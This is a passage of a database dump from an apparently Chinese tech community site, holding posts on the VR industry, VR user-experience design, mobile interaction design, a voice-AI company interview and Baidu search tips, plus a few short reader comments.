Gamer当然是一个重要的市场,但是PC平台并不统一的硬件标准,会很大程度上影响VR体验,相比较而言,主机平台在保证用户体验方面还更加有优势。数量巨大的智能手机用户都是潜在的VR消费者,所以可以预见的未来,移动VR才是竞争的主战场。\n\n移动系统支持\n谷歌在这几年移动市场的竞争中遗憾的没能抢得先机,Android平台虽然还算成功,但是碎片化严重的问题导致利润率根本无法和iOS相提并论。不久以前,谷歌宣布将专门开发为VR应用特别优化的Android系统。看得出谷歌打算要在系统支持上投入更大的精力,期待在新一轮移动VR竞争中,通过Android取得优势。\n\n相比较跑在PC上的VR,移动VR要面临的最大问题其实就是如何高效利用计算资源。PC端有着充分的计算资源,更无须担心电量问题。而且,VR对刷新率要求更高,需要至少在60fps以上才能保障用户体验。这是因为:VR必须跟踪视角随时可能的变化,而且眼睛离屏幕更近使得对细节更加敏感。\n\nAndroid的逻辑分层为通用开发铺平了道路,但是在VR应用中,过多的分层反而导致效率降低,拖慢画面渲染速度,耗电量也随之增加。三星的GearVR在Android上层做了尽可能多的优化,但是如果谷歌可以从更加底层对系统进行优化,为VR应用专门提供一套直接与底层图形渲染通信的api,必然要比应用层的代码调优效果好得多。\n\nVR操作系统\n在体验GearVR的时候,正在你欣赏3D电影的时候收到来电,就必须忙着拆头盔拿手机实在是很让人沮丧的一件事情,这种不流畅的的操作会对移动VR用户体验造成极大的影响。下一步各大科技公司想要得到人机交互技术,就是无需凭借外设、最自然的手势交互技术。最终的目标就是,用户只需要凭空指划就可以精确操作手机,加上手势识别的功能,不需要拆除手机就可以完成对手机的操作。而且AR技术也随着VR的推广进入了人们的视野,通过AR的方式来进行人机交互也在探索中,这将极大的提高移动VR头盔的用户体验。\n\n目前在手势交互技术比较领先的有LeapMotion和uSens两家公司:LeapMotion与Oculus合作,已经推出了一些与VR环境互动的Demo;而uSens的优势则是可以在手机平台实现60fps毫米级的手势操控。用手与VR环境交互也不再是遥不可及的梦想了。\n\n游戏开发平台\n今年小编参观了GDC展会,给我感触最深的除了VR话题之火爆以外,就是愈加开放的游戏引擎了。Unity 3D宣布对年收入10w美元以下的开发者免费,Unreal紧随其后也宣布了对开发者免费的政策,Oculus去年收购了RakNet以后,立刻就开放了源代码。在展会上,Oculus还特别展示了使用CryEngine制作的VR内容。日益开放的游戏开发平台,对制作VR游戏内容开发者社区有重大意义。\n\n游戏\n要说去年Oculus推出了一系列VR内容只能称之为Demo的话,如今VR游戏已经崭露锋芒了!就在今年的E3展会上,除了各大抢眼的3A游戏及其续作,VR游戏绝对是最火爆的话题之一!小编可是排了四个小时的队才体验到了Oculus的消费者版本和配套游戏的说,不过这四个小时的等待绝对值得。先不提Oculus消费者版本进一步的硬件升级和设计改进,最让人印象深刻的就是VR游戏了。\n\n小编体验的是一款叫做Chronos的第三人称ARPG游戏,不错,是第三人称!小编之所以要尝试这一款游戏就是冲着第三人称视角和ARPG去的。大家先入为主的观念是:VR就应该设计用来玩第一人称游戏。但是尝试过这款游戏以后,我认为这完全是偏见。第一人称的代入感的确是VR的长处,但是VR在环境烘托上效果同样感人。全3D画面的精美程度和环境的代入感,都是2D无法比拟的,小编作为忠实的ARPG玩家,玩起来都离不开椅子。想一想未来可能会有的《上古卷轴: VR》、《巫师: VR》和《黑魂: VR》,我就激动不已。\n\nChronos这款游戏使用Xbox手柄操作,画面无颗粒感和延迟感,很流畅。战斗系统虽然并不丰富,但是可以预见,在丰富战斗系统、装备系统并加入各种武器、魔法特效以后,效果绝对惊艳。相信在未来两年,各大游戏厂商都会加入VR支持,成熟的VR游戏也离上市不远了,大家做好升级PC的准备吧!\n\n电影\n好莱坞的电影制作人们已经跃跃欲试的要把电影VR化了,对VR这个新技术他们充满了好奇。其中有一位在和我聊天的时候说,“我为即将到来的改变充满了期待,说实话,我也不知道会是怎样的改变,但是绝对激动人心!”。他们最关心的问题是,怎么用VR技术来展现电影、MTV,甚至是现场音乐会。畅想一下未来,以后看演唱会,位置由你选,台下不爽?让我们站到主唱身边去!\n\n梦工厂的动画实验室更是重新以第一视角,专门渲染了一个VR版本的《驯龙高手》片段,可以让带上VR头盔的你和无牙仔一起翱翔在博克岛的天空!\n\n要制作VR电影,可以拍摄360度的摄像机(拼合画面呈圆柱状)已经不够用了,我们需要球型摄像机(拼合图像是闭合的球状)。硅谷公司Jaunt在这方面非常活跃,不断在VR展会上展示他们最新的Demo。使用Jaunt拍摄的画面全方位无死角(仅在最下方放置支架的地方有一小块盲区),比如当你低头看的时候是看不到三脚架的,仿佛悬空了一样,非常的真实。有兴趣的朋友可以去youtube上搜索,这里我搬运了一个近距离观看Paul McCartney现场演唱会的Demo。\n\n\n\nPaul McCartney现场演唱会VR版 \n\n实时转播现场活动比如体育赛事和演唱会,这个技术难度还是很大的,而且除了提供3D视觉的VR技术,我们还需要提供3D音效的技术,让你在转动视角的时候,双耳音效也同时变化,才能模仿出逼真的现场体验。由于实时技术难度太大,不久可见的VR娱乐内容应该还是电影和MTV这类非实时内容。\n\n轻量级内容\n目前的VR应用主要是游戏和视频,而且这些内容的体量都非常大。你必须下载很大的安装包才能享受数分钟的VR体验,这个瓶颈必然会阻碍VR的广泛普及。所以在线的VR传播平台也是VR产业链里重要的一环。\n\nYoutube已经成功推出了360度视频,允许用户随时选择、切换观看视角。谷歌当然会率先在Youtube推出VR视频内容,这样一来用户就无需再在本地下载大体量的VR视频内容,而是通过Youtube这类在线视频服务来获取VR内容,谷歌一直在大力推广的VP9压缩标准应该也能在视频质量上提供帮助。要做到这一点,可以想到的方法就是在浏览器不断的向视频服务器发送VR头盔的IMU信息,视频服务器通过计算IMU信息得到用户视角信息,返回当前视角帧,保证60fps以上就可以了。位于洛杉矶的创业公司Vrideo做出了一个VR视频分享平台原型,支持Chrome和Firefox,在安装浏览器插件以后配合Oculus使用效果还不错,但是目前来看,难以撼动Youtube在视频市场的地位。\n\n结语\n硬件 -> 移动VR操作系统 -> VR游戏引擎/VR摄影设备 -> 内容(电影、游戏、MTV)-> 内容传播平台,这就构成了VR产业应该具备的基本要素。今年正是各个环节蓬勃发展的时期,可以称之为VR的Alpha年。Alpha已经快半,Beta和Release已经离我们不远啦!',50,0,NULL,0,0,'2019-08-15 15:49:46','2020-08-18 08:56:54',11,NULL,NULL,'',0,NULL,1,'2020-08-18 08:56:54',0,0,0,NULL,1,1,NULL,10,0),(236,NULL,'设计虚拟现实用户体验的深刻见解','沉浸式体验与我们日常所见的界面共享相同的核心组件。常见的界面遵循一个共同的模式:参与、培养同一性、完成目标、最终脱离。\n\n界面会不断地更新迭代。幸运的是,人们已经善于适应新的体验。根据一些界面我们可以很好地适应所在的世界。同时部分界面也需要适应世界,因为我们致力于自身以满足用户体验。\n\n沉浸式体验倾向UX,确保我们所见的世界:自然且直接。\n\n根据创建虚拟现实体验框架,我们将带领大家通过设计见解的五大关键区域促进用户参与沉浸式体验。这些已经在项目开发、用户调查和实验室实验过程中出现。\n\n本文主要从世界的设计、用户感官、用户角色化身、人类与社会的连接、和沉浸式体验的转换五大方面分享设计虚拟现实用户体验见解。\n\n\n\n世界融入生活\n\n世界搭建是开发成功的VR交互和界面的基础。让用户步入一个完整且可信的环境中,允许其延缓难以置信的情绪同时可以自由地与周围环境接触。创建沉浸式世界不仅仅是关于环境声音和可校验的风景的构建。物理世界也必须建立。越来越多的用户购买进入新世界的门票,同时遵循其规则,更加沉浸式和愉快的体验完全可能实现。创建一个深度和目的的环境是建立用户信任的关键,因为当用户在虚拟空间存在时环境可以成长和改变。\n\n虽然许多VR体验依赖故事情节且白手创建世界,但并非都是如此。例如,医学和工程应用并不包含任何的叙事元素。但它们仍需要在自己的世界建立规则、体系结构和导航。\n\n在虚拟现实世界体验并非过于复杂的设计才能令人信服。即使最简单的空间也能唤起用户情感且对用户带来强烈的感触。记住一点,当为VR空间创建内容时,仔细考虑体验对于用户弱点、关注点和期望值的影响。\n\n\n\n丰富的感知\n\n虚拟现实设计师其实是编排场景的导演。当用户在一个有无限选择的大世界中且拥有自由观看任何方向权利,能够吸引用户注意力转向下一个目标或叙事情节才是关键。提供丰富的闪光点吸引用户,向用户灌输一种目的感(去探险、采取行动、见证等),从而带来更好的沉浸式和更加无缝的体验。\n\n当今虚拟现实设计的一项挑战是构建虚拟体验时多样的输入选项必须在考虑范围内。有些硬件解决方案依赖于视觉独立,有些根据手势移动或游戏控制器,还有一些利用自由的运动范围。虚拟体验设计师必须想出一个“响应”解决方案,为用户可用感官的输入与输出优雅地降级。\n\n设计响应体验的目标应该是让用户看到自由运动而不是依靠头部运动进行导航或选择。如果所有的支配方式是视觉和声音,那么声音是虚拟体验的“杀手锏”。对于不同的硬件配置,视觉、音频和声音配置作为最小需求将会带来引人注目的体验。\n\n对于触觉设计,我们需要扩大思维特别是游戏触感,从游戏控制器获取反馈,和体验双脚走在地板上的感觉。触觉反馈有助于用户适应,还提醒他们环境变化。此外,温度或振动也是在设计中需要考虑的因素。游戏体验如The Void,Utah给用户一个强大的沉浸感,因为当玩家激活升降机从一个水平移至另一个水平面时,用户经过时能感受到热量来源或脚下振动。搭配视觉体验、空气中的气味促使玩家根据情节的相关线索继续前进。\n\n\n\n虚拟体验也需要考虑到我们不常想到的感受。例如前庭觉(平衡)和本体感(身体姿势的取向和四肢的运动)。若体验中没有考虑这些感受,用户体验会在很大程度上受到损害。\n\n作为一项最佳实践,开始VR体验时应适应用户体验。首先不应该配戴头戴设备,其次检查自身是否看错了视野,移动椅子/身体位置“开始”体验。其中物理舒适度是关键。坐着体验,同时故事点的位置和目标应该在用户视野内的舒适角度,这些均有助于用户观看。\n\n以上所有的选择可以成为VR设计师作为指导用户体验的方法,该艺术是体验的组合与构成(甚至排斥),通过体验和唤起所需的响应无缝移动用户。\n\n\n\n化身构成UI\n\n用户的化身主要反映了他们是谁以及他们所拥有的能力。使用化身教导用户校正可用的硬件输入与输出。考虑工具和菜单作为用户化身的一部分。化身的所有部分,手是最重要的且即使与身体断开仍是起作用的。\n\n虚拟体验中将会出现用户往下看的一个时刻。不知是否出于好奇心还是寻求虚拟世界中更好的理解角色,往下看不会发现化身的身体会让人非常迷茫和不安。\n\n如果可能,允许用户自定义自己的化身以提高沉浸感。考虑性别、体型和肤色都可刻画出个性的个体。若自定义无法创造出MVP,考虑屏蔽幕后的制服和/或手套。\n\n对于一些用户来说,虚拟身体不同于自己的可以解放。它允许用户倾诉自身的禁忌束缚、灌输勇敢和冒险的思想。这可能会让他们脱离现实世界的限制或疾病。虚拟体验提供比现实更好的机会,体验现实世界中没有的功能。\n\n用户无须附加UI元素可以环顾四周而不是使用他们的手与虚拟世界交互,这是目前开发中最重要的方面。用户需要习惯其化身且接到授权后采取行动。\n\n要让用户在任意方向自由地观看。目前传统的HUDs实践可以让用户集中体验且自由设计师可创建新的交互模式。除了谨慎地置入故事,没有任何东西被附加到用户观看控制中。一些体验中会在屏幕中心出现标线,这应仅在最需要的时候提供。\n\n改变选择、移动和目标从头部移动到用户手中。理想情况下,双手独立行动且不放在一个控制器上。他们在虚拟空间内自然角度移动可见。虚拟空间中的手和工具动作直接影响物理世界中用户移动。展示控制器、工具或可用的UI元素用手呈现可以使用户适应其能力。使用手势来揭示菜单显示选项是有效的方法和工具但是仍然感觉是体验的一部分。\n\n\n\n连接社会关系,为个人空间设计\n\n当用户在虚拟环境中获得代理,社会关系中自然要分享世界和体验。作为空间媒介,孤独感会变得明显。如果这种感觉在故事中不受欢迎,可以考虑用其它字符、或潜能、其它玩家填充空间。\n\n拥有更强的现场感虚拟体内应增加个人空间意识。靠近别人时影响力变大和定向的声音让“面对面”的交谈更引人注目。这变成了提高游戏和社会体验的一个强大工具,然而,用户还会感到脆弱。保持与他人之间的距离对于用户是舒适和安全的关键。\n\n个人空间也延伸到虚拟领土的“所有权”。允许用户建立其家庭环境和社交规定。明确不同层次的交往和弱点在用户之间建立信任。例如,除去公共空间和个人空间,经常玩游戏的用户可能有一个共同的空间可以见面与分享。\n\n\n\n无缝融合世界\n\n当配戴头显时,很容易感觉瞬间被传送到一个虚拟的体验。根据最佳实践,在完全参与体验前应提供引导或中间缓冲区。初始空间为用户提供适应机会,了解控制和为体验做准备。\n\n设计多任务\n确认用户在虚拟现实环境中以科技为中心的生活,允许更多无缝集成到用户的生活。获得电话、短信和其他形式的交流是重要的不仅为了方便,还保持在VR空间的沉浸感。由于接电话或回短信在环境中不得不中断体验比摘除头显或头戴式受话器有更少的沉浸破坏。\n\n考虑中断的用例\n如果一位同事或合作者需要获得你在虚拟现实的注意力,虚拟现实体验应该展示“外面”的世界的认识,并提供有意义的反馈给用户。头显可以调整灯光和使用增强现实元素适应用户和简化虚拟和物理世界之间的过渡。这样用户可以在不删除或调整硬件的情况下暂停体验。\n\n重新适应\n当一个人结束虚拟现实体验且返回到现实世界,通常会有几秒钟到几分钟重新适应环境后摘除头显。重新适应应该在体验开发过程中考虑到和结合使用“解除面罩”在房间中重新声音和适应用户。目前过于繁琐的硬件性质应重新设计用于预测用户的意图和平滑过渡回到现实世界。\n\n总结\n\n沉浸式体验自然会发展更长,更深入。细节的体验设计可以让用户进一步或退出。作为设计师可以从界面专家转化为世界的创造者。\n',50,0,NULL,0,0,'2019-08-15 15:51:47','2021-01-27 15:44:34',12,NULL,NULL,'',0,NULL,1,'2021-01-27 15:44:34',0,2,0,NULL,1,1,NULL,10,0),(239,NULL,'移动办公应用——人机交互','人机交互(HCI),是一门研究系统与用户之间的交互关系的学问。人机交互界面的设计要包含用户对系统的理解,那是为了系统的可用性或者用户友好性。 \n在移动应用中,与人交互的机器从传统电脑变为平板和手机等移动设备,交互方式变为触摸屏,这必然要求人机交互发生相应的改变。\n\n**移动端人机交互**\n现在的移动设备都采用触摸屏,这不仅带来了许多机遇,也存在诸多制约。我们在通过它们浏览内容的同时,也在与内容进行交互。这迫使设计师开始对人体工程学、手势操作、过渡特效,以及针对移动端的交互模式进行思考。\n\n**人体工程学**\n由于在设计移动应用时涉及人体工程学,这要求我们要关注设备的尺寸以及触摸屏的实际问题。例如,用户握持设备和触摸屏幕的方式,直接影响到用户能否轻松触摸到屏幕的某一区域。\n\n**手势操作**\n除了显示内容以外,触摸屏的每一部分都能被用于实现任何功能,这让手势操作成为移动交互设计的重要构成元素。所有触屏操作系统都采用了该操作,包括Android、iOS、Windows 8。\n**\n过渡效果**\n在应用切换于不同显示状态时,过渡效果可以让这个过程显得更加平滑。更多情况下,过渡效果便于用户撤销操作,并防止用户在切换界面过程中“找不着北”。\n\n**Material Design**\nMaterial Design是谷歌推出了全新的设计语言。谷歌表示,这种设计语言旨在为手机、平板电脑、台式机和“其他平台”提供更一致、更广泛的“外观和感觉”。 \nMaterial Design语言的一些重要功能包括系统字体Roboto的升级版本,同时颜色更鲜艳,动画效果更突出。杜拉特还简要谈到了新框架的一些变化——这个新框架也在 google.com/design 公开发布。谷歌的想法是让谷歌平台上的开发者掌握这个新框架,从而让所有应用就有统一的外观,就像是苹果向开发者提出的设计原则一样。谷歌还基于这种新的设计语言对本公司旗舰应用进行了重新设计,包括安卓和网页端的Gmail和Calendar。大家可能还会记得,看到过有关这些变动的文章, 有些博客 已经掌握了外泄截屏,显示经过了重新设计的Gmail,界面更干净、更简约。在安卓平台上,这种新界面被称为Material,支持各种新动画效果,具有内置的实时UI阴影,以及可在不同屏幕之间切换的hero元素。\n\n**环境**\nMaterial环境是一个3D环境,并以垂直设备方向为z轴,每个Material元素在z轴上占据一定的位置并有1dp厚度的标准。 \n在Material环境中,虚拟的光线照射使场景中的对象投射出阴影,主光源投射出一个定向的阴影,而环境光从各个角度投射出连贯又柔和的阴影。Material环境中的所有阴影都是由这两种光投射产生的,阴影是光线照射不到的地方,因为各个元素在z轴上占据了不同大小的位置遮挡住了这些光线。\n\n**Material属性**\n材料具有变化的长宽尺寸(以 dp 为计)和均匀的厚度(1dp)\n材料能改变形状\n材料能在环境中的任何地方自动产生或消失\n**高度和阴影**\nMaterial design 中的对象与现实生活中的对象具有相似的性质。在现实生活中,不同对象可以被堆积或粘贴起来,但是不能彼此交叉。对象自身塑造了自己的阴影并返回自己的光影。 \n依据这些性质所构造出来的空间模型对于用户来说是非常熟悉的,这一模型也可以被长期应用于移动应用当中。支撑这一空间模型的正是“高度”(Elevation)和“光影”(Shadows)这两个概念。\n\n高度是在 Z 轴上两个不同平面之间的一种相对深度或距离。\n“阴影”提供了对象深度和方向性移动的重要视觉线索。它们是唯一一种标示不同平面之间分离程度的视觉线索。某一对象的“高度”决定了其具体“阴影”的表现形式。\n\n\n\n原文链接:https://blog.csdn.net/zzy131250/article/details/51436134',50,0,NULL,0,0,'2019-08-15 16:05:42','2021-01-29 09:49:42',23,NULL,NULL,'',0,NULL,1,'2021-01-27 15:44:34',0,0,0,NULL,1,1,NULL,12,0),(240,NULL,'智能新时代-不一样的人机交互体验','人工智能(Artificial Intelligence, AI )是研究、开发用于模拟、延伸和扩展人的智能的理论、方法、技术及应用系统的一门新的技术科学。 人工智能是计算机科学的一个分支,它企图了解智能的实质,并生产出一种新的能以人类智能相似的方式做出反应的智能机器,该领域的研究包括机器人、语言识别、图像识别、自然语言处理和专家系统等。人工智能从诞生以来,理论和技术日益成熟,应用领域也不断扩大,可以设想,未来人工智能带来的科技产品,将会是人类智慧的“容器”。我们行业(UXPA)观察站首位采访的嘉宾是:龙梦竹Shiny——思必驰市场总监\n\n\n思必驰由剑桥大学团队创建于2007年,2008年回国创业,是国内唯一拥有人机对话技术,国际上极少数拥有自主产权,中英文综合语音技术的公司之一,先后获得三轮融资。思必驰是国内唯一专注于智能硬件领域的语音公司,主要面向智能硬件三个垂直领域:智能车载、智能家居和智能机器人,提供智能语言交互解决方案。\n \nQ&A \nQ1:您对人工智能是持有怎么一个理解呢?您可以从思必驰比较擅长的智能语音这个领域出发来来谈。\n龙梦竹:人工智能这个行业,国内现在特别地关注,但整个的发展已经60多年了。人工智能的话,你要辩证来看,语音智能只是人工智能这个大领域下的多模态交互方面的一环,多模态交互除了语音以外也包括像机器视觉、手势、体感等等,只是语音智能作为最天然的交互入口、最天然的一种交互方式,因此更多地被大家所关注。这两年除了语音智能以外,包括机器视觉,算法上的深度学习,监督模型等等,也是被大家所关注着,现在只是恰好到了人工智能最旺盛的时候。\n\n\nQ2:思必驰的定位是专注人性化的智能语音交互技术,那怎么理解这个个性化智能语音呢?\n龙梦竹:个性化智能语音和场景是一个意思。因为我们在说每一句话,在每一个不同的环境下,他的意思可能是不一样的。比如你在车里开车的时候,你要说一句我饿了,那你在车里对你的车载产品说这句话,你的目的肯定是导航,想找一下餐厅。那你在家里,如果对你的音箱说我饿了,你不会希望音箱给你导航吧,那你需要的可能是订餐。你如果对一个机器人说我饿了,那你有可能是想调戏它,跟它玩。就是我们要打造个性化的产品体验,根据产品跟受众、还有场景的不一样,去做不一样的交互方式。\n\n\nQ3:思必驰主要是做三个垂直领域:智能车载、智能家居和智能机器人。那目前来看,您觉得这三条线,思必驰发展得最快或者是最有前景的是哪一条?\n龙梦竹:现在在我们三大业务领域里,我们在车载后装已经站稳了第一。从去年下半年到现在一直在持续发力的是家居方向。因为这两块场景是未来我们的主打三个业务里面的最前的两个方向。车载目前的饱和度和保有率会特别高,家居非常有前景。因为家居的产品,内部会更多。第二是家居产品的受众的基数肯定是比车载的基数要大的。\n\n\nQ4:关于会话式交互,思必驰在做这个语音类产品的时候,有没有专门的人来做规划设计,或者说有没有专门考虑到用户体验这个问题?\n龙梦竹:从技术上讲,我们有专门的产品部门,是在做整个对话设计的流程。因为语言是没有界面的,但现在很多产品都会配合界面,那么如何让界面显示,如何让语音这种无屏的交互和有屏的产品结合起来,这一块我们是有专门的UI设计。比如怎样的界面对用户来说会更友好,尽量的让每一个界面反馈方式能够让人机交互变得更顺畅,这个是从非技术的角度,从UI的角度去考虑的。\n\n\nQ5:我们知道voice designer在硅谷是比较抢手的,现阶思必驰有没有考虑找一些专门做语音交互的设计师来帮助我们提升产品体验这一块呢?\n龙梦竹:这块未来会是一个重点,现在需求还没有那么高,因为毕竟现在国内这一块以中文为核心的语音交互还在一个大发展的时期,最核心的问题还在技术能力上。关于外部的,包括我们刚刚提到的,现在也会越来越重视整个产品的体验,包括我们在UI界面上也会越来越重视,但是到现在为止,它的核心挑战力还是在底层的技术方向。而且包括你说的voice designer这一块,它其实也是偏技术的。\n\n\nQ6:那您觉得现在国内,智能语音这个行业的发展情况是怎样子的?\n龙梦竹:做中文最好的语音公司,也没有疑问,是在中国。在国内,做语音的龙头企业是科大讯飞。但是从识别率的角度上来讲,现在所有的公司,包括一些规模比我们小的公司,在识别率上其实是相差无几的。而语音技术,它本身是没有盈利模式,没有应用方向,它一定是跟具体的场景、环境和产品结合以后,它才会变得有意义。那么结合到业务领域来看的话,包括科大讯飞、微软、百度,没有哪一家能说自己是最好的。我们以讯飞为例,讯飞的最大的优势在于它识别的语种特别多,因为讯飞有很强烈的政府背景的因素,它的方言识别能够支持40多种,而百度有20多种。相对它们而言,我们是没有做单独的方言识别优化的。我们支持的是带方言的普通话,就是在普通话的范围内做方言的矫正。讯飞在业务领域在教育、医疗方向,它绝对是老大,但在互联网方向,它们的量可能还没有我们大。讯飞虽说总体体量最大,但它在不同的方向下会面临着不同的竞争对手。百度的优势在于通用用户下的识别搜索,但是在具体的业务场景里面,比如说在教育领域,它肯定比不过讯飞,在银行客服领域,它比不过捷通华声。每个领域下其实都有一两家是比较突出的。\n\n\nQ7:那在您看来,目前我们的交互发展水平到了什么程度?已经可以产品化运用到我们的生活当中了,还是仅仅是停留在一些概念性的demo层面?\n龙梦竹:早就已经应用了,现在所谓的demo概念层面是一些新的前沿技术,有的还在实验室阶段。但是整个语音人机交互早就已经进入到我们的生活中,而且是各个领域都有。比如医疗领域,现在百度、讯飞都在做的一件事就是用语音来输入电子病历。教育领域,像口语评测,讯飞在这个方向做得最好,在高考和各种考试中已经开始普及。\n\n\nQ8:那您觉得国内国外在语音智能这一块的发展方向或者是发展重点上有什么不同吗?\n龙梦竹:这块其实还真没有什么不同,基本上现在大家在做的都是对话,做多人情景的理解和语义。随着人工智能的火热,越来越多的创业公司也在做这些内容,但稍微不一样的是,现在的创业公司可能没有了我们当年的机会去做这种从底层技术、到实验室研发到交互到一体化的这种能力。现在很多的创业公司更多的是在做比我们还要单点垂直,还要细分的方向。比如新的创业公司只做这个语义理解或者只做麦克风阵列,做里面的芯片模块,或者是只做合成这一块,对他们来讲的话还会有一些新的机会。从前沿技术来看,包括百度、讯飞,包括我们,大家现在基本上都是在做声纹,或者是去解决远场交互的问题,解决语义理解。方向其实大同小异,因为语音的几个基本点都是围绕这几个点去解决实际场景下的问题,所以方向大概都是一样的。\n\n\nQ9:最后一个问题。您觉得语音交互行业未来的发展趋势还有前景是怎样的呢?\n龙梦竹:像我们刚刚其实在提的一个前景,就是说从单一的模态交互向多模态的交互发展。这其实是说语音是入口,有一个概念层次就是这个意思,可能会在语音的基础上会加更多的模态识别和交互。第一个方向是从单一的模态交互向多模态的交互来发展。比如说车里的防疲劳的辅助驾驶,通过影像的识别配合声音,用语音交互来做更便捷的交互方式,用虹膜,机器视觉来判断疲劳驾驶所辅助。比如机器人,通过声音确定用户方向,通过面部识别抓取,锁定用户行动轨迹。现在很多的产品已经在用多模态交互的方式来做人际交互的体验了。第二个方向是从被动式交互方式到主动式,甚至更加个性化的服务。现在我们都是先对机器发出指令,机器才会反馈你。那么未来,机器就可以根据用户的一些需求,随时分辨并智能推荐。第三个从技术上来讲,声纹识别技术发展会对人际交互的体验有很大改善。比如在什么时候它通过什么样的办法来判断你的性别,你的情绪。这些就是真正的个性化智能服务,这块是跟底层技术等各个方向分不开的,我觉得这个是整个语音发展的三个大的方向。\n \nUXPA中国成立于2004年,是中国本土的第一个非盈利性用户体验行业协会组织。UXPA中国致力于推动用户体验在中国的发展提高,提供一个专业的交流和学习平台,为中国最具影响力的用户体验组织。经过13年的努力,UXPA中国在中国用户体验行业具有相当高的知名度及影响力,UXPA中国组织的活动或项目也获得国内外企业及行业人士的高度认可,聚集一大批大部分活跃在中国的用户体验专业人员、产品经理、关注用户体验行业发展的人群。',50,4,NULL,0,0,'2019-08-15 16:09:07','2021-01-27 15:43:33',373,NULL,NULL,'',0,NULL,1,'2021-01-27 15:43:33',0,4,1,'2020-10-12 19:19:32',1,0,NULL,24,0),(241,NULL,'如何利用百度进行高效地信息检索','版权声明:本文为博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。\n本文链接:https://blog.csdn.net/abc_12366/article/details/86774653\n百度搜索的毛病无非两条:1. 广告、2. 推销。\n\n使用 Chrome 浏览器。\n\n记住一些常用的搜索技巧,\n比如 site、inurl、intitle、intext 等,这些小技巧能提高你搜索的效率。\n\n鲁迅\n\n\n\n如果你只是想要屏蔽百家号,很简单\n\n鲁迅 -baijiahao\n\n\n使用更严格的筛选,下面的指令将过滤掉所有百家号内容\n\n鲁迅 -site:baijiaohao.baidu.com\n\n\n\n或者干脆屏蔽掉所有百度相关的东西\n\n鲁迅 -site:*.baidu.com\n\n\n\n\n屏蔽了百度相关的网页,还能间接屏蔽广告。\n用 Burp 等抓包软件可以看出,这是一个跳转链接,以百度开头。\n\nhttp://www.baidu.com/baidu.php?url=\n\n\n\n\n\n\n\n上面的缺点是在屏蔽广告的同时也屏蔽了百度百科。如果想要既屏蔽百度广告,又保留百度百科,要用到一些辅助的插件。\n\n下面介绍两款 Chrome 插件\n\n- Tampermonkey(油猴子)\n- Adblock Plus(爱迪布劳克 · 普拉斯)\n\n以下是使 Adblock 前后的对比图。\n\n\n\n\n\n另外,使用 \"\"(双引号)进行精确搜索,也能达到屏蔽广告的效果。\n\n\n\n百度已死?仁者见仁智者见智罢了。我看百度没死,只要稍微用点技巧,百度搜索便又活了过来。据说百度是 “更符合中国人搜索习惯的搜索引擎”,这句话我不作评价。\n\n想起来之前的新闻,同样是搜索引擎,同样是搜索 “鲜嫩”,谷歌出现的是正儿八经的果冻、酱鸭之类的饮食,而百度则是满屏嘿嘿嘿的内容,,对此官方的回应是,百度能记住用户的输入,根据智能算法最终将 “用户最想搜索的结果呈现到用户面前”,相比之下谷歌搜索则显得 “冷静得多”。\n\n说百度 “符合中国人的搜索习惯”,也许吧。百度搜索强在中文,它拥有世界上最大的中文网页库,也是世界上最大的中文搜索引擎。比如搜索 “日历”,百度会出现农历和阳历,这是谷歌没有的;再比如搜索最近比较叫座的新年喜剧《疯狂的外星人》,百度除了有简介、评分外,还给出了观影链接和一些边边角角的东西。\n\n\n\n\n\n回归之前的话题和谷歌一样,你可以使用搜索技巧进行搜索。比如想要搜索某 PDF 文件,,\n\n流畅的Python filetype:pdf\n1\n至于能不能搜到就是另一回事了。类似的例子参见我之前谷歌骇客的博文。\n\n百度搜索的另一个特色就是网页右边的 “百度搜索风云榜”,如果你闲的无聊,随便点点看,看看最近的热搜和趣闻,也是一件消遣。\n--------------------- \n版权声明:本文为CSDN博主「鸾林居士」的原创文章,遵循CC 4.0 by-sa版权协议,转载请附上原文出处链接及本声明。\n原文链接:https://blog.csdn.net/abc_12366/article/details/86774653',50,0,NULL,0,0,'2019-08-15 16:27:29','2021-01-27 15:43:32',52,NULL,NULL,'',0,NULL,1,'2021-01-27 15:43:32',0,2,0,'2020-09-07 16:29:51',1,1,NULL,13,0),(337,NULL,'克隆代码检测问题','克隆代码是指由于复制粘贴等操作导致的重复或相似代码,主要分为type1-4类。请问type4类克隆代码的现有检测方法有哪些?',115,0,NULL,0,0,'2020-08-18 08:55:16','2021-01-27 15:44:33',26,NULL,NULL,NULL,0,NULL,1,'2021-01-27 15:44:33',0,0,0,'2020-08-18 08:58:12',1,1,NULL,14,NULL),(343,NULL,'Ruby On Rails + Vuejs是开发利器吗?-22','Ruby On Rails + Vuejs是开发利器吗?-22Ruby On Rails + Vuejs是开发利器吗?-22',47,0,NULL,0,0,'2020-08-19 10:01:13','2021-01-27 15:44:32',35,NULL,NULL,NULL,0,NULL,1,'2021-01-27 15:44:32',0,1,0,NULL,1,1,NULL,21,NULL),(344,240,'智能新时代-不一样的人机交互体验','评论还可以发帖吗',1,0,NULL,0,0,'2020-08-19 11:07:38','2020-08-21 09:28:37',0,240,NULL,NULL,0,NULL,1,'2020-08-21 09:28:37',0,1,0,NULL,1,NULL,NULL,NULL,NULL),(345,240,'智能新时代-不一样的人机交互体验','挺好的',1,1,NULL,0,0,'2020-08-21 08:41:57','2020-09-15 16:24:56',0,240,NULL,NULL,0,NULL,1,'2020-08-21 09:28:36',0,1,0,'2020-09-15 16:24:56',1,NULL,NULL,NULL,NULL),(346,232,'脑机接口,改变下一代人机交互方式?','?\n的方式',1,0,NULL,0,0,'2020-08-21 10:10:02','2020-08-21 10:10:28',8,232,NULL,NULL,0,NULL,1,'2020-08-21 10:10:17',0,0,0,'2020-08-21 10:10:28',1,NULL,NULL,NULL,NULL),(348,2,'加速人工智能发展,Arm最近做了这三件事……','Arm公司在芯片制造方面的确是很厉害的。',46,1,NULL,0,0,'2020-08-24 15:06:30','2020-08-24 15:19:29',0,2,NULL,NULL,0,NULL,1,'2020-08-24 15:18:47',0,0,0,'2020-08-24 15:19:29',1,NULL,NULL,NULL,NULL),(349,348,'加速人工智能发展,Arm最近做了这三件事……','中国也需要加快步伐,探讨自己的出路',66,0,NULL,0,0,'2020-08-24 15:19:29','2021-01-27 15:53:21',0,2,NULL,NULL,0,NULL,1,'2021-01-27 15:53:21',0,0,0,NULL,1,NULL,NULL,NULL,NULL),(353,345,'智能新时代-不一样的人机交互体验','我把原创给改掉了,我觉得应该是来自网络吧,不是原创。',46,0,NULL,0,0,'2020-08-25 16:00:10','2021-01-27 15:53:20',0,240,NULL,NULL,0,NULL,1,'2021-01-27 